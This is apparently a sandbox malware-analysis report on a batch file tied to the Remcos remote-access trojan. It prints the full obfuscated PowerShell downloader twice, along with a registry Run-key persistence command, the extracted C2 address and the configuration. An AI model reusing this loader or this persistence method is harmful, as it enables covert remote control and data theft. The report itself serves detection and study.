Analysis

  • max time kernel
    147s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    31-01-2025 08:09

General

  • Target

    DOCUMENTS.bat

  • Size

    4KB

  • MD5

    7025208c5d6067587a8751c96fad91bb

  • SHA1

    83c115ba5c3383e18ec4fc18bcd867ef25867684

  • SHA256

    806fca5f68d315a77af1d8ac514192a59fabee15ad1d171eefcb2fd8ea6e2aa1

  • SHA512

    ae642cd90acabbae5fe71267ca1e378090c0d38ab831314c5157ba137826d001766f69cbf379865e0089b31d12604d72e51d302215b8ab01b29d8c97ea29cc0b

  • SSDEEP

    96:uC+ueoWu3xTKFjwSd7XphWxDI2o9vJ17RAy39Qy2l0ShxkdN:uHubp3QFM4muwy39Qy2lTuf

Malware Config

Extracted

Family

remcos

Botnet

Bvas572137Ele

C2

www.caravanehamburg.de:8563

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Fahfg62153EbG-7BXUPM

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\DOCUMENTS.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "echo $Udstykningsomraaders; function Basunistens($Kalkeringers){$Eager=2;do{$Hjttaleranlggenes71+=$Kalkeringers[$Eager];$Eager+=3} until(!$Kalkeringers[$Eager])$Hjttaleranlggenes71}function Rebelly($belittlers){ .($Prparaternes) ($belittlers)}$Vandhanerne=Basunistens 'S NHoeA TV,. Dw';$Vandhanerne+=Basunistens 'L.eNeBL c Hl Li BeInNAfT';$Samilla=Basunistens 'S MAnoNoz Si.ilEdlSka ,/';$Eagermpulsfunktions=Basunistens '.lT Fl ys,v1 p2';$Xenoparasitism=' n[ GnViepyt ..C SCuE BRA VO.i Cn eSqPFro Li,iN MT vm Ra .nMeaElG DEVirSt]Do:.a: aSLaE TcB,UReRDjit TP yN.P RKuo ttL OMaCProUdlFo=Re$BeeInA eGKee r bM phaU LNeST.FS,U N TKReTSviBaOQun iS';$Samilla+=Basunistens 'Lu5An. v0Ge Bi(exW,ui InNodCao Aw FsTr eNBaT.i He1St0 C.Pr0Co;Mi ToWCliUnn 6Ap4Im;T. Ax e6Ju4Re;So Anr,ivK,:,l1K 3Mo4.m.Fr0 )Mu nG We.ocR,kAwoSk/ r2 g0P,1Ha0Sa0 C1,n0G,1 S cF Ti ar GeBofBlos,xMn/Sa1M 3.i4Te. R0';$recontemplating=Basunistens 'C uAws HeMiRSe-.saM gRiEPiNSeT';$Splejser=Basunistens ' ihA,tMot hpVe:Te/Ku/d wZowErw . .tPahSke Nv FiMesCli MoSynVeo PfL.eMen Ue nr AgT y K.c c .o RmDy/PeJ VePho UpT /BrCKihAni NgHunDooF.nNoeKvnE..A m sPoo';$Monophonies=Basunistens 'Ta>';$Prparaternes=Basunistens 'SaIFoEMoX';$officialise='Circumconic';$Christianshavneres='\Sippenipper.Sge';Rebelly (Basunistens 'T $ ,GNoL.yO SBKrA SlKo:m aSnfpnd UeH.L PI nN ,G,aSP.sWiY dG.rENeP PLFyED.Js EPerA.sAmK .E IRStN eeP 1p,6Re3Ne=E $FieTrN Iv N:N.A,iPshPZaDMaA et aAT +La$,oc ahleRPrI.is.atS iwrAStNS SSuHP,A eVMiNChe pRFie ,S');Rebelly (Basunistens 'Un$PaG lT,ODob,iaFoL D:BrrUnoA,M .ASnSJo=B $,nsBipUglPoE FjDaS ESor . s xpT.L TI t a(Sy$ omMeO.nN eoInPS.hFlO RN Vi REKos e)');Rebelly (Basunistens $Xenoparasitism);$Splejser=$Romas[0];$Byggearbejdere=(Basunistens 'Fr$U.gBrlMoo aBO aAuLCa:DerNaE uL IIW G KiSaOHuNP SStSPiTIrR UI MD IE.gKihBueGedUn=UnNC E DwCa-KhO SBGaJFiEMaC.nTU. ,sFoyS SSst ReMem,a.p,$ScV haAlnfodSkH hAFln tE ,RBrnBrE');Rebelly ($Byggearbejdere);Rebelly (Basunistens 'S,$H,RUneViltaiPyghuiMeo OnNas nsh tu r DiPodPriFzgHehAneTrd S. aH TeGaaEudBnePlr s ,[ B$ForRee UcS,o InM tS eRempupF lFuaS tS iSpn ng r]Mo=Ho$E.SSaad m,piVelPil Oa');$Afslibningen=Basunistens 'Su$ dROneHyl iFrgD iGao,gnNnsDas tForStiArdS iP gDuhDieOcddo. aDdooU,wTenDal eo la rd.nFUni Sl Fe i(Be$ TSmapFelHoe TjDesCheD rkl,Sa$JaC HoPhmEnpFoa mtAni.aeomnSitTh8An1P )';$Compatient81=$Afdelingssygeplejerskerne163;Rebelly (Basunistens 'Ka$SlgSol soSabs,a,eLFl:V G .u SDKoS Freo IR UGKaaMeaMde NboDTaeSl=Be(TrtOse ,S.ytfd-Frp VaDitHyHH, An$Dic,dO OmFePNoaF tImIF e.en fTCa8 e1Ma)');while (!$Gudsforgaaende) {Rebelly (Basunistens '.r$ yg.nlSaoG bSya lBr:hjD.ui UrVaeL,k ItToi nv.ie BrJanUdeSksDi=,a$ViDCoo jnZaeTyrskeStdP.e') ;Rebelly $Afslibningen;Rebelly (Basunistens 'udSuntReA,trPuTCu-ElSOpLSaEFaeSap B 4');Rebelly (Basunistens ' m$WiGArlenO BMoaU LUn: BG Bu.odC sR FS O aRPaGKna vAHee N D SE =,h(PoTI e es mt F-Pap FaHeT Lh.i ,$.sCk oCommepGiASpT i UERenAct S8Sc1 T)') ;Rebelly (Basunistens 'Ra$NoGDiLOvOM bDiAF,lR :Leb,oO btRihO,iJuEIl2Ti2 4 P= a$ G,olYaOAlBSya lS :Dip UOB.LAkYKeaSkdMaeT.l,oPMyHPaIEuAC + O+ D%Pu$AuRS.oBrMRhaAfsIm. FCUnoAluMyN.et') ;$Splejser=$Romas[$Bothie224]}$Hjlpemiddels223=331968;$Rucked=28368;Rebelly (Basunistens ' $BogScLSuOOvb oaSkL A: DFeARof rFLaY .DDooZiWT N ldAri L elPiY U H=Re DeGAreOvT T-DecgeO tNSttTueNanD TSu fo$NicPhOCoM,sPSiA sT eIPee,aNRoTSk8 1');Rebelly (Basunistens ' B$b,g lBooBrbOva.ol i:P sCim TaPea MkForduaEnvIsl.rsPr Fi=Ng Am[,nS nySusOvt oeBjmTi.SpCHjoF nSav eStrKotSt] a:Ac: FP.r.koC mDaB Ma rsS eSu6Sm4.iSR tusr iUdnC gEl(Po$ DIna ,fAmfS yCod oViw ,nDadafi Ll olPayL.)');Rebelly (Basunistens 'No$C GUdlFaoT b.oaW lSm:AnKTorPeAH KP nMeIYaN ngG Etsns ag=Gr N[ErsSpYH,sOvTSbE umNo.SkT,eES X Ht p.Exe eNSmCNaODeD,aiKeN gA,] C:Bi:,vA KSHyc I liSi.A G MeKatUrs.at.lr i eNC.g I( A$LiSLpmReaFoA AK ,r.vA .vDol rsJe)');Rebelly (Basunistens ' ,$X GRoLFioO,b A,il : CCV o pnBrtAurPlaNoSVatKn=Ba$TakI rF AF,kCenKoiDanSmgJaefeN.h.R sInU aBBesD tSoRn IneNStg.t( o$ nHmij.klDePGlemem eI dcyDIne.olk sE 2,f2m 3 C, l$ReR ZULyCfokfieomdCe)');Rebelly $Contrast;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2288
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Udstykningsomraaders; function Basunistens($Kalkeringers){$Eager=2;do{$Hjttaleranlggenes71+=$Kalkeringers[$Eager];$Eager+=3} until(!$Kalkeringers[$Eager])$Hjttaleranlggenes71}function Rebelly($belittlers){ .($Prparaternes) ($belittlers)}$Vandhanerne=Basunistens 'S NHoeA TV,. Dw';$Vandhanerne+=Basunistens 'L.eNeBL c Hl Li BeInNAfT';$Samilla=Basunistens 'S MAnoNoz Si.ilEdlSka ,/';$Eagermpulsfunktions=Basunistens '.lT Fl ys,v1 p2';$Xenoparasitism=' n[ GnViepyt ..C SCuE BRA VO.i Cn eSqPFro Li,iN MT vm Ra .nMeaElG DEVirSt]Do:.a: aSLaE TcB,UReRDjit TP yN.P RKuo ttL OMaCProUdlFo=Re$BeeInA eGKee r bM phaU LNeST.FS,U N TKReTSviBaOQun iS';$Samilla+=Basunistens 'Lu5An. v0Ge Bi(exW,ui InNodCao Aw FsTr eNBaT.i He1St0 C.Pr0Co;Mi ToWCliUnn 6Ap4Im;T. Ax e6Ju4Re;So Anr,ivK,:,l1K 3Mo4.m.Fr0 )Mu nG We.ocR,kAwoSk/ r2 g0P,1Ha0Sa0 C1,n0G,1 S cF Ti ar GeBofBlos,xMn/Sa1M 3.i4Te. R0';$recontemplating=Basunistens 'C uAws HeMiRSe-.saM gRiEPiNSeT';$Splejser=Basunistens ' ihA,tMot hpVe:Te/Ku/d wZowErw . .tPahSke Nv FiMesCli MoSynVeo PfL.eMen Ue nr AgT y K.c c .o RmDy/PeJ VePho UpT /BrCKihAni NgHunDooF.nNoeKvnE..A m sPoo';$Monophonies=Basunistens 'Ta>';$Prparaternes=Basunistens 'SaIFoEMoX';$officialise='Circumconic';$Christianshavneres='\Sippenipper.Sge';Rebelly (Basunistens 'T $ ,GNoL.yO SBKrA SlKo:m aSnfpnd UeH.L PI nN ,G,aSP.sWiY dG.rENeP PLFyED.Js EPerA.sAmK .E IRStN eeP 1p,6Re3Ne=E $FieTrN Iv N:N.A,iPshPZaDMaA et aAT +La$,oc ahleRPrI.is.atS iwrAStNS SSuHP,A eVMiNChe pRFie ,S');Rebelly (Basunistens 'Un$PaG lT,ODob,iaFoL D:BrrUnoA,M .ASnSJo=B $,nsBipUglPoE FjDaS ESor . s xpT.L TI t a(Sy$ omMeO.nN eoInPS.hFlO RN Vi REKos e)');Rebelly (Basunistens $Xenoparasitism);$Splejser=$Romas[0];$Byggearbejdere=(Basunistens 'Fr$U.gBrlMoo aBO aAuLCa:DerNaE uL IIW G KiSaOHuNP SStSPiTIrR UI MD IE.gKihBueGedUn=UnNC E DwCa-KhO SBGaJFiEMaC.nTU. ,sFoyS SSst ReMem,a.p,$ScV haAlnfodSkH hAFln tE ,RBrnBrE');Rebelly ($Byggearbejdere);Rebelly (Basunistens 'S,$H,RUneViltaiPyghuiMeo OnNas nsh tu r DiPodPriFzgHehAneTrd S. aH TeGaaEudBnePlr s ,[ B$ForRee UcS,o InM tS eRempupF lFuaS tS iSpn ng r]Mo=Ho$E.SSaad m,piVelPil Oa');$Afslibningen=Basunistens 'Su$ dROneHyl iFrgD iGao,gnNnsDas tForStiArdS iP gDuhDieOcddo. aDdooU,wTenDal eo la rd.nFUni Sl Fe i(Be$ TSmapFelHoe TjDesCheD rkl,Sa$JaC HoPhmEnpFoa mtAni.aeomnSitTh8An1P )';$Compatient81=$Afdelingssygeplejerskerne163;Rebelly (Basunistens 'Ka$SlgSol soSabs,a,eLFl:V G .u SDKoS Freo IR UGKaaMeaMde NboDTaeSl=Be(TrtOse ,S.ytfd-Frp VaDitHyHH, An$Dic,dO OmFePNoaF tImIF e.en fTCa8 e1Ma)');while (!$Gudsforgaaende) {Rebelly (Basunistens '.r$ yg.nlSaoG bSya lBr:hjD.ui UrVaeL,k ItToi nv.ie BrJanUdeSksDi=,a$ViDCoo jnZaeTyrskeStdP.e') ;Rebelly $Afslibningen;Rebelly (Basunistens 'udSuntReA,trPuTCu-ElSOpLSaEFaeSap B 4');Rebelly (Basunistens ' m$WiGArlenO BMoaU LUn: BG Bu.odC sR FS O aRPaGKna vAHee N D SE =,h(PoTI e es mt F-Pap FaHeT Lh.i ,$.sCk oCommepGiASpT i UERenAct S8Sc1 T)') ;Rebelly (Basunistens 'Ra$NoGDiLOvOM bDiAF,lR :Leb,oO btRihO,iJuEIl2Ti2 4 P= a$ G,olYaOAlBSya lS :Dip UOB.LAkYKeaSkdMaeT.l,oPMyHPaIEuAC + O+ D%Pu$AuRS.oBrMRhaAfsIm. FCUnoAluMyN.et') ;$Splejser=$Romas[$Bothie224]}$Hjlpemiddels223=331968;$Rucked=28368;Rebelly (Basunistens ' $BogScLSuOOvb oaSkL A: DFeARof rFLaY .DDooZiWT N ldAri L elPiY U H=Re DeGAreOvT T-DecgeO tNSttTueNanD TSu fo$NicPhOCoM,sPSiA sT eIPee,aNRoTSk8 1');Rebelly (Basunistens ' B$b,g lBooBrbOva.ol i:P sCim TaPea MkForduaEnvIsl.rsPr Fi=Ng Am[,nS nySusOvt oeBjmTi.SpCHjoF nSav eStrKotSt] a:Ac: FP.r.koC mDaB Ma rsS eSu6Sm4.iSR tusr iUdnC gEl(Po$ DIna ,fAmfS yCod oViw ,nDadafi Ll olPayL.)');Rebelly (Basunistens 'No$C GUdlFaoT b.oaW lSm:AnKTorPeAH KP nMeIYaN ngG Etsns ag=Gr N[ErsSpYH,sOvTSbE umNo.SkT,eES X Ht p.Exe eNSmCNaODeD,aiKeN gA,] C:Bi:,vA KSHyc I liSi.A G MeKatUrs.at.lr i eNC.g I( A$LiSLpmReaFoA AK ,r.vA .vDol rsJe)');Rebelly (Basunistens ' ,$X GRoLFioO,b A,il : CCV o pnBrtAurPlaNoSVatKn=Ba$TakI rF AF,kCenKoiDanSmgJaefeN.h.R sInU aBBesD tSoRn IneNStg.t( o$ nHmij.klDePGlemem eI dcyDIne.olk sE 2,f2m 3 C, l$ReR ZULyCfokfieomdCe)');Rebelly $Contrast;"
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtCreateThreadExHideFromDebugger
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2920
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Acotyledonous" /t REG_EXPAND_SZ /d "%Hemidactylus% -windowstyle 1 $Bc=(gi 'HKCU:\Software\Sprhagens\').GetValue('Laramie');%Hemidactylus% ($Bc)"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2452
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Acotyledonous" /t REG_EXPAND_SZ /d "%Hemidactylus% -windowstyle 1 $Bc=(gi 'HKCU:\Software\Sprhagens\').GetValue('Laramie');%Hemidactylus% ($Bc)"
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:1884

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab4B16.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar4B58.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RI9HUWZOE1JAGM5774XH.temp

    Filesize

    7KB

    MD5

    acf40d0f9215ae3eb6890f2c6c119963

    SHA1

    39dfb178e13f48227287a003883281eb1bbfa618

    SHA256

    e6fc7fe48428a4c75e68d3e3fe69171cfd6da4b6b3fa67e5f6d3d19de26051b4

    SHA512

    eefa41157918b5795ad4d09902657d2b466e6094edf03367135b06c5667ab7b95f9e9c200c795e1560c87a7f780182fee704772b08db2a3c6c8f3a8fcb45fadb

  • C:\Users\Admin\AppData\Roaming\Sippenipper.Sge

    Filesize

    469KB

    MD5

    bd591a627872df6cf9d82c96994abdd9

    SHA1

    caad35c5bdbdaba1a3f728e60a8aa28220938056

    SHA256

    5a86a332e61c9eaf949d28891611a6eaa4baa327b776703a559fe9cd329f8f1b

    SHA512

    800a478e3827babe983980e155fe630c14c191e4b214d9d7b18bcfe94ebcf65a00b9a9210cd2aeb7525848922bea036e6e33fa5f7268a93a6f526db828083304

  • memory/2288-13-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp

    Filesize

    4KB

  • memory/2288-9-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

    Filesize

    9.6MB

  • memory/2288-10-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

    Filesize

    9.6MB

  • memory/2288-12-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

    Filesize

    9.6MB

  • memory/2288-4-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp

    Filesize

    4KB

  • memory/2288-15-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

    Filesize

    9.6MB

  • memory/2288-8-0x00000000022B0000-0x00000000022B8000-memory.dmp

    Filesize

    32KB

  • memory/2288-7-0x000000001B200000-0x000000001B4E2000-memory.dmp

    Filesize

    2.9MB

  • memory/2288-6-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

    Filesize

    9.6MB

  • memory/2288-5-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

    Filesize

    9.6MB

  • memory/2920-19-0x0000000006180000-0x000000000B232000-memory.dmp

    Filesize

    80.7MB

  • memory/2920-21-0x000000000B240000-0x000000000C2A2000-memory.dmp

    Filesize

    16.4MB

  • memory/2920-73-0x000000000B240000-0x000000000C2A2000-memory.dmp

    Filesize

    16.4MB